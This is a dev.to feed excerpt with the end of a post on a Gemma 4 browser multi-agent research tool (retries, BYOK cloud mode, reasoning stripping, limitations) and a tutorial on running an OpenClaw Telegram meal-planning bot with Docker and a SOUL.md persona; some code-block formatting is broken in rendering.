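&lt;p&gt;The parallel gather is a straightforward &lt;code&gt;Promise.allSettled&lt;/code&gt;. In this sketch the source functions are injected so the shape is testable; in the repo they wrap the Wikipedia and Hacker News fetchers in &lt;code&gt;js/tools.js&lt;/code&gt;, and a failed source degrades to empty notes instead of failing the worker.&lt;/p&gt;

```javascript
// Fetch every source in parallel; never let one source's failure
// take down the whole evidence pass.
async function gatherEvidence(query, sources) {
  const settled = await Promise.allSettled(
    sources.map(({ name, search }) =>
      search(query).then((notes) => ({ name, notes }))));
  return settled.map((s, i) =>
    s.status === 'fulfilled' ? s.value : { name: sources[i].name, notes: [] });
}
```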

&lt;h3&gt;
  
  
  7. Cloud mode was the next thing the project needed
&lt;/h3&gt;

&lt;p&gt;Local Gemma 4 E2B at 3 to 5 minutes per query is real and unavoidable on consumer GPUs. The architecture only worked at "single user with patience" volume. Adding a cloud option mattered because it lets the same architecture run at 30 seconds per query on bigger Gemma 4 variants.&lt;/p&gt;

&lt;p&gt;The challenge was doing it without compromising the privacy story for users who care about it. Solution: BYOK. The Settings panel has a key input that writes only to localStorage. The public code contains no key (verified with &lt;code&gt;git grep&lt;/code&gt; for &lt;code&gt;AIza&lt;/code&gt; patterns before every push). The cloud path makes one fetch per agent call directly to &lt;code&gt;generativelanguage.googleapis.com&lt;/code&gt; from the user's browser. We never see the key, never proxy the requests, never log anything.&lt;/p&gt;

&lt;p&gt;The cloud adapter has a 60-second per-call timeout (we observed one worker hang indefinitely while the other two completed) and a two-stage resilience strategy. First, each model gets up to three attempts with 1s/2s exponential backoff if the API returns a 5xx, a 429, an empty body, or a timeout. Google's "Internal error encountered" on Gemma 4 is almost always transient and clears within one retry. Second, if a model still fails after retries, we fall through to the other Gemma 4 variant in the chain (E4B and 31B Dense). Hard errors like 404 (model not on your key) skip straight to the next variant; auth and bad-request errors bail immediately.&lt;/p&gt;
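&lt;p&gt;The two-stage strategy reduces to a nested loop. This is a sketch under assumptions: the names are illustrative, and the error classification (&lt;code&gt;fatal&lt;/code&gt; for auth/bad-request, &lt;code&gt;skipModel&lt;/code&gt; for 404) is elided into flags rather than real HTTP status handling.&lt;/p&gt;

```javascript
// Stage 1: retry each model with backoff on transient failures.
// Stage 2: fall through to the next Gemma variant in the chain.
async function callWithResilience(models, callModel, { delays = [1000, 2000] } = {}) {
  for (const model of models) {
    for (let attempt = 0; ; attempt++) {
      try {
        return await callModel(model);
      } catch (err) {
        if (err.fatal) throw err;            // auth / bad request: bail immediately
        if (err.skipModel) break;            // e.g. 404: straight to the next variant
        if (attempt >= delays.length) break; // retries exhausted: next variant
        await new Promise((r) => setTimeout(r, delays[attempt]));
      }
    }
  }
  throw new Error('all models failed');
}
```

Used as, say, <code>callWithResilience(['gemma-4-26b-a4b-it', 'gemma-4-31b-it'], callGemini)</code>, each model gets up to three attempts before the chain moves on.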

&lt;h3&gt;
  
  
  8. Gemma 4 dumps its thinking into the response
&lt;/h3&gt;

&lt;p&gt;Even with &lt;code&gt;thinkingConfig.thinkingBudget=0&lt;/code&gt; (which the API rejects for Gemma 4 with a 400, by the way), Gemma 4 on the Gemini API outputs its internal reasoning verbatim: drafts, refinement passes, and "Word count check" notes before the actual final answer. My first cloud query produced about 600 words of thinking out loud before the clean, structured answer.&lt;/p&gt;

&lt;p&gt;Fix: client-side stripping. The synthesizer's output always starts with &lt;code&gt;## Where they agreed&lt;/code&gt;. Find the LAST occurrence of that heading, trim everything before it. Strip leading "Final Polish:" / "Refined version:" labels. The model's thinking goes in the bin; the user sees only the polished output.&lt;/p&gt;
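&lt;p&gt;The stripper itself is a few lines. A minimal sketch (&lt;code&gt;stripThinking&lt;/code&gt; is a hypothetical name; the real code handles a few more label variants):&lt;/p&gt;

```javascript
// Keep only the final structured answer: everything from the LAST
// occurrence of the synthesizer's opening heading onward.
function stripThinking(text) {
  const marker = '## Where they agreed';
  const i = text.lastIndexOf(marker);
  let out = i >= 0 ? text.slice(i) : text;
  // If the marker is missing, at least drop leading editorial labels.
  out = out.replace(/^(Final Polish:|Refined version:)\s*/i, '');
  return out.trim();
}
```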

&lt;h2&gt;
  
  
  What I want to be honest about
&lt;/h2&gt;

&lt;p&gt;A few things people might assume from the demo that are not actually true.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Local mode is sequential, not parallel.&lt;/strong&gt; WebGPU LLM inference is single-stream per session. The three perspective agents take turns on one GPU. The visualization makes it look concurrent. Logically it is, physically it is not. Cloud mode actually fires three parallel Gemini calls but the synthesizer still waits for all three.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cloud mode is private to Google, not to me.&lt;/strong&gt; Your queries go to Google's servers. Your key goes from your browser directly to Google. I never see either. But this is different from the local mode promise of "nothing leaves your tab." Both are valid trade-offs; you pick.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Niche cross-domain queries return weak findings.&lt;/strong&gt; When the public sources do not have an opinion to mine, the agents lean on training knowledge alone. They are honest about which claims have evidence versus widely-held belief.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The 3 GB local-mode download is real.&lt;/strong&gt; No way around it for first-time local visitors. We gate the download behind an explicit click and persist via the browser cache so reload is free. Cloud mode is the alternative for visitors who do not want to commit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Factual lookup queries do not benefit from this architecture.&lt;/strong&gt; If you ask "What is photosynthesis?" the skeptic does not really argue against photosynthesis. Three perspective agents on a factual lookup just produce three slightly different summaries of the same article. AgentMesh shines on questions with actual disagreement.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I would build next
&lt;/h2&gt;

&lt;p&gt;If I keep working on this past the challenge, four things in priority order.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Native Gemma 4 tool calling.&lt;/strong&gt; The model has a structured tool-call format built into its chat template. Right now I use a deterministic dispatch (Wikipedia + HN comments in parallel). Switching to the native format would make tool selection cleaner and add another concrete reason the project specifically uses Gemma 4.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multimodal, properly.&lt;/strong&gt; Gemma 4 E2B is multimodal. The code paths for image input exist in &lt;code&gt;model.worker.js&lt;/code&gt; but I rolled them back because per-component dtype configuration on diverse Chrome drivers needed more debugging than the challenge time-box allowed. Drop an image into the prompt. The skeptic argues against what is in it. The advocate argues for. The pragmatist describes how it gets used.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;More than three perspectives.&lt;/strong&gt; A historical agent (how did this work in the past?). A futurist agent (where is this going?). A user-of-the-thing agent. The architecture trivially extends.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;More sources.&lt;/strong&gt; Reddit JSON, Brave Search (would need a second BYOK key), Stack Exchange. Each broadens the grounding for opinionated queries.&lt;/p&gt;

&lt;p&gt;I am not committing to any of these yet. What I do next depends on what happens with this post. If a hospital CTO emails me about clinical literature review with locally-bound data, I will go faster on something like a persistent OPFS notebook. If five engineers fork the repo, I will go faster on multimodal and tool-calling. If neither, this stays a portfolio piece I am happy with.&lt;/p&gt;

&lt;h2&gt;
  
  
  Thanks
&lt;/h2&gt;

&lt;p&gt;To Google DeepMind for releasing Gemma 4 with weights small enough to actually fit in a browser tab AND making the bigger variants available on AI Studio for free, so the same project can run at two scales. To Hugging Face for Transformers.js, especially the 4.2.0 release that finally worked end to end. To gzuidhof for the coi-serviceworker library, which solved the cross-origin isolation problem in about five minutes once I knew it existed. To nico-martin for publishing the gemma4-browser-extension code, which was my reference for which library version actually loads this model. To everyone who keeps the open browser-ML stack moving forward.&lt;/p&gt;

&lt;p&gt;The code is MIT. Fork it. Rip out the parts you want. If you build something better with it, I would love to see what.&lt;/p&gt;

</description>
      <category>gemmachallenge</category>
      <category>devchallenge</category>
      <category>gemma</category>
      <category>webgpu</category>
    </item>
    <item>
      <title>How to Turn Any SaaS Into a Telegram Bot in 30 Minutes Using OpenClaw</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Sun, 19 Apr 2026 21:52:15 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/how-to-turn-any-saas-into-a-telegram-bot-in-30-minutes-using-openclaw-581j</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/how-to-turn-any-saas-into-a-telegram-bot-in-30-minutes-using-openclaw-581j</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/openclaw-2026"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;: Wealth of Knowledge&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem Every SaaS Founder Has
&lt;/h2&gt;

&lt;p&gt;You built a beautiful web app. Users love it. But friction is real: they have to open the browser, navigate to your site, log in, and then use your product.&lt;/p&gt;

&lt;p&gt;What if they could just message you on Telegram?&lt;/p&gt;

&lt;p&gt;Last week I gave my meal planning SaaS &lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;MealAI&lt;/a&gt; a Telegram interface using &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;. It took 30 minutes. No webhook hosting. No bot framework to learn. No custom API glue code.&lt;/p&gt;

&lt;p&gt;Here is exactly how I did it, and how you can do the same for any SaaS.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Will Build
&lt;/h2&gt;

&lt;p&gt;A Telegram bot that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Talks in your product's voice (not generic ChatGPT)&lt;/li&gt;
&lt;li&gt;Has your product's domain expertise baked in&lt;/li&gt;
&lt;li&gt;Responds with branded formatting (emojis, bold, structure)&lt;/li&gt;
&lt;li&gt;Can be extended to call your real APIs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Time:&lt;/strong&gt; 30 minutes&lt;br&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Free (Docker + OpenAI API credits)&lt;br&gt;
&lt;strong&gt;Prerequisites:&lt;/strong&gt; Basic Docker knowledge, an OpenAI or Anthropic API key&lt;/p&gt;
&lt;h2&gt;
  
  
  Why OpenClaw?
&lt;/h2&gt;

&lt;p&gt;Before OpenClaw, building a Telegram AI bot meant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Node.js backend with grammY or telegraf&lt;/li&gt;
&lt;li&gt;A hosted webhook endpoint&lt;/li&gt;
&lt;li&gt;Custom prompt management&lt;/li&gt;
&lt;li&gt;Session and memory handling&lt;/li&gt;
&lt;li&gt;Rate limiting logic&lt;/li&gt;
&lt;li&gt;Deployment pipeline&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;OpenClaw is an MIT-licensed AI agent runtime that handles all of this in one binary. It supports 25+ messaging platforms (Telegram, WhatsApp, Discord, Slack, Signal, iMessage, and more). Your agent works on any of them without code changes.&lt;/p&gt;

&lt;p&gt;Think of it as the WordPress of AI agents for messaging.&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 1: Install Docker (2 min)
&lt;/h2&gt;

&lt;p&gt;On macOS, I recommend &lt;a href="https://orbstack.dev/" rel="noopener noreferrer"&gt;OrbStack&lt;/a&gt;. It is lighter than Docker Desktop.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;brew &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--cask&lt;/span&gt; orbstack
open &lt;span class="nt"&gt;-a&lt;/span&gt; OrbStack

On Linux or Windows, use Docker Desktop.
Verify it works:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker --version&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 2: Pull OpenClaw (2 min)
&lt;/h2&gt;

&lt;p&gt;Create a working directory:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;mealai-concierge &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;mealai-concierge

Pull the pre built image:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker pull ghcr.io/openclaw/openclaw:latest&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 3: Create a Telegram Bot (3 min)
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Open Telegram, search for &lt;a class="mentioned-user" href="https://dev.to/botfather"&gt;@botfather&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Send /newbot&lt;/li&gt;
&lt;li&gt;Choose a name and username (must end in _bot)&lt;/li&gt;
&lt;li&gt;Copy the HTTP API token&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Your bot URL will be &lt;code&gt;t.me/your_bot_username&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 4: Configure OpenClaw (5 min)
&lt;/h2&gt;

&lt;p&gt;Create a &lt;code&gt;docker-compose.yml&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="na"&gt;openclaw-gateway&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ghcr.io/openclaw/openclaw:latest&lt;/span&gt;
&lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="na"&gt;HOME&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/home/node&lt;/span&gt;
&lt;span class="na"&gt;TZ&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;UTC&lt;/span&gt;
&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;./openclaw-config:/home/node/.openclaw&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;./openclaw-workspace:/home/node/.openclaw/workspace&lt;/span&gt;
&lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18789:18789"&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18790:18790"&lt;/span&gt;
&lt;span class="na"&gt;init&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="na"&gt;restart&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;unless-stopped&lt;/span&gt;
&lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;node&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;dist/index.js&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;gateway&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--bind&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;lan&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;--port&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18789"&lt;/span&gt;

&lt;span class="na"&gt;Create openclaw-config/openclaw.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
json&lt;br&gt;
{&lt;br&gt;
"gateway": {&lt;br&gt;
"mode": "local"&lt;br&gt;
},&lt;br&gt;
"channels": {&lt;br&gt;
"telegram": {&lt;br&gt;
"enabled": true,&lt;br&gt;
"botToken": "YOUR_TELEGRAM_BOT_TOKEN_HERE",&lt;br&gt;
"dmPolicy": "open",&lt;br&gt;
"allowFrom": ["*"]&lt;br&gt;
}&lt;br&gt;
},&lt;br&gt;
"agents": {&lt;br&gt;
"defaults": {&lt;br&gt;
"model": "openai/gpt-4o-mini"&lt;br&gt;
}&lt;br&gt;
}&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;Create openclaw-config/agents/main/agent/auth-profiles.json:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"version"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"profiles"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"openai:default"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"api_key"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"provider"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"openai"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nl"&gt;"key"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sk-YOUR_OPENAI_KEY_HERE"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;##&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Step&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Secret&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Sauce,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;SOUL.md&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;min)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;where&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;generic&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;chatbot&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;transforms&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;your&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;product's&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;voice.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;Create&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;openclaw-workspace/SOUL.md:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;# SOUL.md — MealAI Concierge

You are MealAI Concierge, a friendly AI meal-planning assistant.

## Your Role
Help busy people answer: "What's for dinner?" and plan their week.

## Personality
- Warm, conversational, concise
- Opinionated about food (no hedging)
- Practical over perfect
- Real people eat real food

## What You Do Best
- Suggest meal plans (day or week)
- Build grocery lists grouped by store section
- Adapt to preferences (vegetarian, budget, high protein, picky kids)
- Explain nutrition simply
- Recipe quick hits: ingredients plus 5 steps

## Response Format
- Bold meal names
- Sparse emojis (salad, pasta, breakfast)
- Under 200 words unless asked for detail

## Rules
- Never open with "Great question!", just answer
- Redirect off topic: "That is outside my kitchen!"
- Always end with a follow-up: "Want the grocery list?"
- Mention usemealai.com for full features
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why SOUL.md is powerful:&lt;/strong&gt; OpenClaw injects this at the system-prompt level on every conversation, so the model always sees these instructions before user messages. That is why the persona stays consistent. It is not fine-tuning; it is prompt engineering at the right architectural layer.&lt;/p&gt;
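&lt;p&gt;"Injected at the system-prompt level" just means the persona file is prepended to every model call, ahead of history and the new message. A minimal sketch, assuming a chat-completions-style message array (the function name and shapes here are illustrative, not OpenClaw internals):&lt;/p&gt;

```python
# Minimal sketch of system-prompt injection: the persona file is prepended
# to every model call, ahead of conversation history and the new user message.

def build_messages(soul_md: str, history: list[dict], user_text: str) -> list[dict]:
    return (
        [{"role": "system", "content": soul_md}]  # persona always comes first
        + history                                 # prior turns
        + [{"role": "user", "content": user_text}]
    )

msgs = build_messages("You are MealAI Concierge...", [], "What's for dinner?")
print(msgs[0]["role"])  # system
```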
&lt;h2&gt;
  
  
  Step 6: Start It Up (1 min)
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt;

Check the logs:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker compose logs -f openclaw-gateway&lt;/p&gt;

&lt;p&gt;You should see:&lt;br&gt;
&lt;code&gt;[telegram] [default] starting provider (@YourBotName_bot)&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 7: Test It (2 min)
&lt;/h2&gt;

&lt;p&gt;Open Telegram, find your bot, and say:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"Hi, who are you?"&lt;/li&gt;
&lt;li&gt;"What is for dinner tonight?"&lt;/li&gt;
&lt;li&gt;"I am vegetarian, plan my week"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You will see it respond as your product, not as ChatGPT.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Magic Revealed
&lt;/h2&gt;

&lt;p&gt;Here is what OpenClaw is doing under the hood:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User message (Telegram)
        ↓
OpenClaw Gateway (long-polling the Telegram API)
        ↓
System prompt assembly:
  - Your SOUL.md (persona)
  - Your IDENTITY.md (name, vibe)
  - Conversation history
        ↓
Routed to OpenAI gpt-4o-mini
        ↓
Response sent back via the Telegram API
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;You never wrote a single line of bot-framework code. The entire integration layer is one SOUL.md file.&lt;/p&gt;
&lt;h2&gt;
  
  
  Next Level Moves
&lt;/h2&gt;

&lt;p&gt;Once the basics work, you can layer on:&lt;/p&gt;
&lt;h3&gt;
  
  
  Add custom skills (call your real API)
&lt;/h3&gt;

&lt;p&gt;Create an OpenClaw skill that fetches real meal plans from your SaaS database. OpenClaw has a plugin SDK that lets the agent decide when to call your API based on the user's message.&lt;/p&gt;
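&lt;p&gt;I have not shown OpenClaw's plugin SDK here, so treat this as a generic tool-dispatch sketch of the idea: you expose a schema, the model decides when to invoke it, and the runtime calls your real backend. Every name in this block (&lt;code&gt;get_meal_plan&lt;/code&gt;, the schema shape) is hypothetical.&lt;/p&gt;

```python
# Generic tool-dispatch sketch (NOT OpenClaw's actual SDK): the agent exposes a
# tool schema, and when the model requests it, the runtime calls your real API.
import json

MEAL_TOOL = {
    "name": "get_meal_plan",
    "description": "Fetch a stored meal plan from the MealAI backend",
    "parameters": {"diet": "string", "days": "integer"},
}

def get_meal_plan(diet: str, days: int) -> dict:
    # Stub standing in for a real HTTPS call to your SaaS database
    return {"diet": diet, "days": days, "monday": "Lentil curry"}

def dispatch(tool_call: dict) -> str:
    if tool_call["name"] == "get_meal_plan":
        return json.dumps(get_meal_plan(**tool_call["arguments"]))
    raise ValueError(f"unknown tool: {tool_call['name']}")

result = dispatch({"name": "get_meal_plan", "arguments": {"diet": "vegetarian", "days": 7}})
print(result)
```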
&lt;h3&gt;
  
  
  Multi-channel in one line
&lt;/h3&gt;

&lt;p&gt;Want the same bot on WhatsApp, Discord, or Signal? Add another entry to channels:&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
json
"channels": {
"telegram": { "enabled": true, "botToken": "..." },
"discord": { "enabled": true, "botToken": "..." },
"whatsapp": { "enabled": true }
}

One codebase. Every platform.
### Persistent memory
The openclaw-workspace directory is your bot's long term memory. Drop markdown files with user preferences, FAQs, or product knowledge. OpenClaw pulls from them contextually.
### Control UI dashboard
OpenClaw ships with a web dashboard at http://localhost:18789 where you can:
* See every conversation live
* Monitor API costs
* Debug prompts
* Switch models
## What I Learned
1. The prompt IS the product. SOUL.md is not just instructions. It is the difference between a demo and a product people want to use.
2. Messaging beats web apps for AI. Users never open Telegram. It is always open. Your SaaS suddenly has zero friction.
3. Open source AI runtimes are ready. OpenClaw handles production grade concerns (auth, rate limiting, logging, multi channel) out of the box.
4. Docker is enough. No Kubernetes. No serverless. Just docker compose up.
## The Repo
Full working setup (zero secrets included):
&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;
        mealai-concierge
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🍳 MealAI Concierge&lt;/h1&gt;
&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;Your personal AI meal-planning assistant — right in Telegram.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Built with &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt; + &lt;a href="https://shopsmartai.org" rel="nofollow noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt; for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Live at:&lt;/strong&gt; &lt;a href="https://usemealai.com" rel="nofollow noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;/p&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;What it does&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;Ask "What's for dinner?" in Telegram and get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📅 Personalized weekly meal plans&lt;/li&gt;
&lt;li&gt;🛒 Grocery lists organized by store section&lt;/li&gt;
&lt;li&gt;🥗 Dietary adaptations (vegetarian, gluten-free, budget, etc.)&lt;/li&gt;
&lt;li&gt;🍳 Quick recipes with ingredients + steps&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Architecture&lt;/h2&gt;
